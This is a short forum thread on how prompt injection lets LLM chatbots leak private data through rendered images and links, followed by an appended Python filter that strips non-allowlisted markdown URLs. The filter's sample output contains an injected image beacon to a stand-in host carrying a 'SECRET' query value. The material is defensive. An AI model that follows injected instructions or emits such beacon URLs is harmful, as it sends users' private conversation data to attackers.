by simonw 663 days ago
These attacks aren't quite the same as HTML injection and XSS.

LLM-based chatbots rarely have XSS holes. They allow a very strict subset of HTML to be displayed.

The problem is that just supporting images and links is enough to open up a private data exfiltration vector, due to the nature of prompt injection attacks.

2 comments

yup, basically showing if you ask AI nicely to <insert secret here>, it's dumb enough to do so. And that can then be chained with things that on their own aren't particularly problematic.
More like XXE I'd say.
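Added example, not from anyone in the thread: a minimal output-side mitigation for the vector simonw describes. Even when the chat UI renders only a strict subset of markdown (images and links), each image or link URL is a request the user's browser will make, so anything the model was induced to put in that URL leaves the session. The filter below keeps only `https` URLs whose host is on an allowlist and drops the rest, keeping the visible label text. The allowlist hosts, the sample model output and the regex are all constructed for this example; a real deployment would run this against the markdown renderer's own AST rather than a regex.

```python
import re
from urllib.parse import urlsplit

# Constructed allowlist: hosts the chat UI may fetch images from or link to.
ALLOWED_HOSTS = {"example-chat.test", "cdn.example-chat.test"}

# Matches markdown images ![alt](url) and links [text](url), with an optional title.
_MD_REF = re.compile(r'(!?)\[([^\]]*)\]\(([^)\s]+)(?:\s+"[^"]*")?\)')


def is_allowed_url(url: str) -> bool:
    """True only for https URLs pointing at an allowlisted host.

    Relative URLs, data: URIs and plain http are rejected; a model-controlled
    query string on an unknown host is exactly the exfiltration channel.
    """
    parts = urlsplit(url.strip())
    if parts.scheme != "https":
        return False
    return (parts.hostname or "").lower() in ALLOWED_HOSTS


def sanitize_markdown(text: str):
    """Strip image/link targets that are not allowlisted.

    Returns (sanitized_text, removed_urls). The removed list is what you
    would log or alert on: a URL carrying session content is a signal that
    the prompt was injected, not just a rendering problem.
    """
    removed = []

    def repl(m: re.Match) -> str:
        label, url = m.group(2), m.group(3)
        if is_allowed_url(url):
            return m.group(0)          # keep the reference untouched
        removed.append(url)
        return label                    # keep visible text, drop the request

    return _MD_REF.sub(repl, text), removed


# Constructed model output: one injected image beacon, one legitimate link.
SAMPLE_OUTPUT = (
    "Summary done. ![pixel](https://untrusted.test/pixel.png?d=SECRET) "
    "See [docs](https://cdn.example-chat.test/help)."
)

if __name__ == "__main__":
    clean, dropped = sanitize_markdown(SAMPLE_OUTPUT)
    print(clean)
    print("dropped:", dropped)
```

The point of returning the dropped URLs rather than silently discarding them is detection: a model that emits an image URL to a host you never configured is a reliable indicator of prompt injection, and that event is worth logging with the conversation ID.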